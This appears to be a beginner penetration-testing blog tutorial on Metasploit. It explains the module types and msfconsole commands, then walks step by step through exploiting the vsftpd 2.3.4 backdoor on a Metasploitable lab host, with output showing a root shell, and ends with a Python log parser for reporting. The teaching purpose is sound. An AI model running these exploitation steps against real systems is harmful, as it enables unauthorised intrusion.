Mr Elite

Posted on • Originally published at securityelites.com

Day 21: Metasploit Framework — From Module to Shell (Complete Beginner's Guide 2026)

🟣 PHASE 3 BEGINS — CORE ATTACK TECHNIQUES (DAYS 21–35)

Phase 2 gave you the web application layer. Phase 3 adds the infrastructure exploitation layer — Metasploit, network exploitation, post-exploitation, privilege escalation, pivoting, and Active Directory attacks. The tools and techniques professionals use when web vulnerabilities lead to deeper access.

⚖️ Authorised use only: All Metasploit demonstrations use Metasploitable 2 in your isolated lab. Using Metasploit against systems you don’t own or have explicit written permission to test is illegal under computer crime laws globally. The tool’s power is precisely why authorisation documentation is non-negotiable — every professional engagement starts with written scope before any Metasploit module runs.


Everything you’ve learned in the first 20 days was building to this moment. You understand networks. You understand web vulnerabilities. You understand the methodology. Now you get the tool that professional penetration testers use on virtually every infrastructure engagement — a framework containing over 2,400 exploits, integrated payloads, and a post-exploitation platform that turns a single vulnerable service into comprehensive server access.

Metasploit is not a magic button. Students who learn it before understanding the underlying concepts treat it as a black box. You’re different — you’ve spent 20 days building the foundation. Today Metasploit makes sense not just as a set of commands, but as a system whose design reflects exactly the attack concepts you’ve already internalised.

The Metasploit Framework was created by H.D. Moore in 2003 and acquired by Rapid7 in 2009. The Community and open-source versions remain free and are pre-installed on Kali Linux. Metasploit Pro (commercial) adds automation and reporting. For this course — and for most professional testing purposes — the open-source version is entirely sufficient.

📋 Day 21 Contents

  1. Metasploit Architecture — How It’s Built
  2. msfconsole — Navigation & Core Commands
  3. The Search → Use → Options → Run Workflow
  4. Auxiliary Modules — Scanning & Brute Force
  5. First Exploit — vsftpd Backdoor on Metasploitable
  6. Payloads — Shells, Staged & Stageless
  7. Meterpreter — Post-Exploitation Powerhouse
  8. Session Management
  9. msfdb — Saving Your Work
  10. Day 21 Practical Task

Metasploit Architecture — Understanding What You’re Working With

Before touching the console, understand the structure. Metasploit is a modular framework — every capability is a module of a specific type. Knowing the module types tells you exactly where to look when you need a particular capability.

EXPLOIT
Takes advantage of a vulnerability. Requires a payload. Examples: MS17-010 (EternalBlue), vsftpd 2.3.4 backdoor.

AUXILIARY
Supporting tasks — scanners, fuzzers, brute forcers, sniffers. No payload required. Examples: port scanners, service version detectors.

PAYLOAD
What executes on the target after exploitation. Reverse shell, bind shell, Meterpreter, command execution, file operations.

POST
Post-exploitation modules — privilege escalation, credential dumping, lateral movement. Run after a Meterpreter session is established.

ENCODER
Transforms payloads to evade detection. Obfuscates the payload bytes. Shikata Ga Nai (x86) is the classic example.

NOP / EVASION
NOP sleds for buffer overflow exploits. Evasion modules generate AV-evasive executable payloads. Advanced use cases.

msfconsole — Navigation & Core Commands

msfconsole is the primary interface for the Metasploit Framework. It’s a command-line console with its own set of commands and tab-completion. Launch it from any Kali terminal and you’ll see the banner and the msf6 > prompt. Everything in Metasploit flows through this interface.

msfconsole — launching and essential navigation commands

    # Launch Metasploit
    msfconsole

    # Or with database support enabled
    msfdb init && msfconsole

    # ── Core navigation commands ────────────────────────────────
    help                                      # Show all available commands
    search vsftpd                             # Search modules by keyword
    use 0                                     # Select module by index number from search results
    use exploit/unix/ftp/vsftpd_234_backdoor  # Select by full path
    info                                      # Show full module info (description, refs, options)
    options                                   # Show required and optional module options
    show payloads                             # List compatible payloads for current exploit
    set RHOSTS 192.168.56.101                 # Set target IP
    set LHOST 192.168.56.100                  # Set your Kali IP (for reverse shells)
    set LPORT 4444                            # Set listener port
    run                                       # Execute the module (also: exploit)
    back                                      # Deselect current module, return to msf6 >
    sessions                                  # List all active sessions
    sessions -i 1                             # Interact with session 1
    exit                                      # Exit msfconsole

    # ── Global options (set once, apply to all modules) ─────────
    setg RHOSTS 192.168.56.101                # Global set (persists across modules)
    setg LHOST 192.168.56.100
    unsetg RHOSTS                             # Remove global setting
    save                                      # Save global settings to disk

💡 Tab completion is your best friend: msfconsole has full tab completion for module paths, option names, and commands. Type use exploit/ and press Tab twice to browse exploit categories. Type set R and press Tab to see all options starting with R. Never type full module paths from memory — tab-complete them.

The Core Workflow — Search → Use → Options → Set → Run

Every Metasploit engagement follows the same five-step pattern regardless of the target or vulnerability. Master this workflow and you’ll be comfortable with any module in the framework.

The five-step Metasploit workflow — annotated

    # ── STEP 1: SEARCH ──────────────────────────────────────────
    msf6 > search type:exploit name:vsftpd

    Matching Modules

    #  Name                                  Disclosure Date  Rank       Check  Description
    -  ----                                  ---------------  ----       -----  -----------
    0  exploit/unix/ftp/vsftpd_234_backdoor  2011-07-03       excellent  No     vsFTPd v2.3.4 Backdoor Command Execution

    # Search operators
    search type:exploit platform:linux rank:excellent
    search cve:2017-0144    # EternalBlue by CVE
    search name:samba       # All Samba modules

    # ── STEP 2: USE ─────────────────────────────────────────────
    msf6 > use 0
    msf6 exploit(unix/ftp/vsftpd_234_backdoor) >

    # Prompt changes — you’re now inside the module context

    # ── STEP 3: OPTIONS ─────────────────────────────────────────
    msf6 exploit(unix/ftp/vsftpd_234_backdoor) > options
    Module options (exploit/unix/ftp/vsftpd_234_backdoor):

    Name    Current Setting  Required  Description
    ----    ---------------  --------  -----------
    RHOSTS                   yes       Target IP
    RPORT   21               yes       Target port (default 21)

    # Required fields with no value must be set before running

    # ── STEP 4: SET ─────────────────────────────────────────────
    set RHOSTS 192.168.56.101
    RHOSTS => 192.168.56.101

    # ── STEP 5: RUN ─────────────────────────────────────────────
    run
    [*] 192.168.56.101:21 - Banner: 220 (vsFTPd 2.3.4)
    [*] 192.168.56.101:21 - USER: 331 Please specify the password.
    [+] 192.168.56.101:21 - Backdoor service has been spawned, handling...
    [+] 192.168.56.101:21 - UID: uid=0(root) gid=0(root)
    [*] Found shell.
    [*] Command shell session 1 opened
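The status lines printed by `run` in step 5 are the evidence that ends up in the engagement report. The following added example (not part of the original article or of Metasploit) parses such a transcript into one record per target and rates what was actually confirmed; the sample log is constructed, and the `Finding`, `parse_run_log` and `severity` names and the three-level scale are assumptions made for illustration.

```python
import re
from dataclasses import dataclass
from typing import Optional

# Constructed sample of spooled msfconsole output from an isolated lab (illustrative values).
SAMPLE_LOG = """\
[*] 192.168.56.101:21 - Banner: 220 (vsFTPd 2.3.4)
[*] 192.168.56.101:21 - USER: 331 Please specify the password.
[+] 192.168.56.101:21 - Backdoor service has been spawned, handling...
[+] 192.168.56.101:21 - UID: uid=0(root) gid=0(root)
[*] Found shell.
[*] Command shell session 1 opened
[*] 192.168.56.102:21 - Banner: 220 (vsFTPd 3.0.3)
[*] Exploit completed, but no session was created.
"""

# Status marker, optional "host:port -" prefix (ASCII hyphen or en dash), then the message.
LINE = re.compile(r"^\[[*+!-]\]\s+(?:(?P<host>\d+(?:\.\d+){3}):(?P<port>\d+)\s+[-–]\s+)?(?P<msg>.*)$")

@dataclass
class Finding:  # hypothetical record type for the report
    host: str
    port: int
    banner: str = ""
    uid: str = ""
    session: Optional[int] = None

def parse_run_log(text):
    """Group status lines per target; session lines carry no host, so they go to the last target seen."""
    findings, current = {}, None
    for raw in text.splitlines():
        m = LINE.match(raw.strip())
        if not m:
            continue  # prompts, typed commands and blank lines in a spool file
        msg = m["msg"]
        if m["host"]:
            key = (m["host"], int(m["port"]))
            current = findings.setdefault(key, Finding(*key))
            if msg.startswith("Banner:"):
                current.banner = msg.split(":", 1)[1].strip()
            elif msg.startswith("UID:"):
                current.uid = msg.split(":", 1)[1].strip()
        elif current and (s := re.search(r"session (\d+) opened", msg)):
            current.session = int(s.group(1))
    return list(findings.values())

def severity(f):
    """Assumed scale: root shell confirmed > shell confirmed > banner observed only."""
    if f.session is not None:
        return "critical" if f.uid.startswith("uid=0(") else "high"
    return "info"

if __name__ == "__main__":
    for f in parse_run_log(SAMPLE_LOG):
        print(f"{f.host}:{f.port}  {severity(f):8}  {f.banner}  {f.uid or '-'}")
```

msfconsole's `spool` command writes console output to a file, which can be passed to `parse_run_log` as text; lines that are not status lines are skipped.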

